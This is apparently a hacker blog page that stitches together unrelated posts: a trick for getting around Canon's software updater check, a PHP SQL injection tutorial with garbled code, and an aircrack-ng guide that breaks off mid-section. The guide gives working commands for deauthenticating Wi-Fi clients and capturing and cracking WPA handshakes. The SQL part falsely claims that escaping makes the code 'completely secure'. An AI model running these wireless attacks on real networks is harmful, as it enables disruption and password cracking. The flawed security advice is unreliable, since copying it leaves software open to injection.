Hacker Blog

Today I had a small product photo-shoot and lo and behold, I forgot my CF card.

Canon has this nifty program called Digital Photo Professional through their EOS Utility.  You can take a picture from and save to your computer with it.  Every Canon camera comes with a cd full of great software like this.. but like any true techie I threw away the manufacture disks.

For some reason Canon refuses to give away this software online. Even though the software only works with their cameras and every camera comes with a copy they wont let you download it! Some bigwig CEO must have freaked out when hearing “free” and “online” in the same sentence.

Whats worse is this software is not on any torrent sites or rapidshare.

Well, fortunately for me, there was a work around.

For Mac:

1. Download the latest “Updater” for your program here.
   1. Choose EOS > Digital EOS Camera > Your Model
   2. Navigate to “Drivers and Downloads”
   3. Choose OSX under the “Driver / Software Section”
2. Mount the dmg image file.
3. In the image you should see a file called “UpdateInstaller”  Drag that to you desktop.
4. Control-click the “UpdateInstaller” on your desktop and choose “Show Package Contents” in the menu.
5. In the new window go to Contents > Resources
6. Delete updated.plist - update: it may be called update.plist now
7. Run the software.
8. Enjoy!

Canon, mind getting your act together? Its not like some Nikon user is going to take advantage of the free software you payed good money to develop.  You are a leader in digital photography, so step up to the digital age and distribute the software freely in both material and digital form.

What is an SQL Injection

An SQL injection is an exploit that manipulates the database of a website. It may grab a password you dont want shared or simply rewrite it in the database.

This tutorial will explain how an SQL Injections works and how to avoid this type of attack.

String Injections

Lets imagine a piece of PHP that retrieved the age a member on your forum. To do this the PHP uses a $_GET command to retrieve this data and goes to another page.

The code may look like this

$age = $ _GET [ 'age'];
$requete = mysql_query ( "SELECT age FROM members WHERE age = '$ age'");


This is potentially a nasty piece of code. What on could do is instead of asking for the age one could potentially ask for the password of that user!

String Injections Protection

Its not that difficult to protect yourself from this attack. All it takes is switching out a little code.

Instead of using $_Get replace it with mysql_real_escape_string ()
The code from above changes to


$age = mysql_real_escape_string($_GET['age']);
$requete = mysql_query ( "SELECT age FROM members WHERE age = '$ age'");


Your PHP is now completely secure against this type of attack!

This attack sends disassocate packets to one or more clients which are currently associated with a particular access point. Disassociating clients can be done for a number of reasons

1. Recovering a hidden ESSID. This is an ESSID which is not being broadcast.
2. Capturing WPA/WPA2 handshakes by forcing clients to reauthenticate
3. Generate ARP requests (Windows clients sometimes flush their ARP cache when disconnected)

Of course, this attack is totally useless if there are no associated wireless client or on a fake authentications.

Usage

aireplay-ng -0 1 -a 00:14:6C:7E:40:80 -c 00:0F:B5:34:30:30 ath0

Where:

-0 means deauthentication

1 is the number of deauths to send (you can send muliple if you wish); 0 means send them continuously

-a 00:14:6C:7E:40:80 is the MAC address of the access point

-c 00:0F:B5:34:30:30 is the MAC address of the client to deauthenticate; if this is omitted then all clients are deauthenticated

ath0 is the interface name

Usage Examples

Typical Deauthentication

First, you determine a client which is currently connected. You need the MAC address for the following command:

aireplay-ng -0 1 -a 00:14:6C:7E:40:80 -c 00:0F:B5:34:30:30 ath0

Where:

-0 means deauthentication

1 is the number of deauths to send (you can send muliple if you wish)

-a 00:14:6C:7E:40:80 is the MAC address of the access point

-c 00:0F:B5:34:30:30 is the MAC address of the client you are deauthing

ath0 is the interface name

Here is what the ouput looks like:

11:09:28 Sending DeAuth to station — STMAC: [00:0F:B5:34:30:30]

WPA/WPA2 Handshake capture with an Atheros

airmon-ng start ath0

airodump-ng -c 6 –bssid 00:14:6C:7E:40:80 -w out ath0

(switch to another console)

aireplay-ng -0 5 -a 00:14:6C:7E:40:80 -c 00:0F:B5:AB:CB:9D ath0

(wait for a few seconds)

aircrack-ng -w /path/to/dictionary out.cap

Here the explaination of the above commands:

airodump-ng -c 6 –-bssid 00:14:6C:7E:40:80 -w out ath0

Where:

-c 6 is the channel to listen on

–bssid 00:14:6C:7E:40:80 limits the packets collected to this one access point

-w out is the file prefix of the file name to be written

ath0 is the interface name

aireplay-ng -0 5 -a 00:14:6C:7E:40:80 -c 00:0F:B5:AB:CB:9D ath0

Where:

-0 means deauthentication attack

5 is number of groups of deauthentication packets to send out

-a 00:14:6C:7E:40:80 is MAC address of the access point

-c 00:0F:B5:AB:CB:9D is MAC address of the client to be deauthenticated

ath0 is the interface name

Here is what the output looks like from “aireplay-ng -0 5 -a 00:14:6C:7E:40:80 -c 00:0F:B5:AB:CB:9D ath0”

12:55:56

Sending DeAuth to station

– STMAC: [00:0F:B5:AB:CB:9D]

12:55:56

Sending DeAuth to station

– STMAC: [00:0F:B5:AB:CB:9D]

12:55:57

Sending DeAuth to station

– STMAC: [00:0F:B5:AB:CB:9D]

12:55:58

Sending DeAuth to station

– STMAC: [00:0F:B5:AB:CB:9D]

12:55:58

Sending DeAuth to station

– STMAC: [00:0F:B5:AB:CB:9D]

ARP request generation with a Prism2 card

airmon-ng start wlan0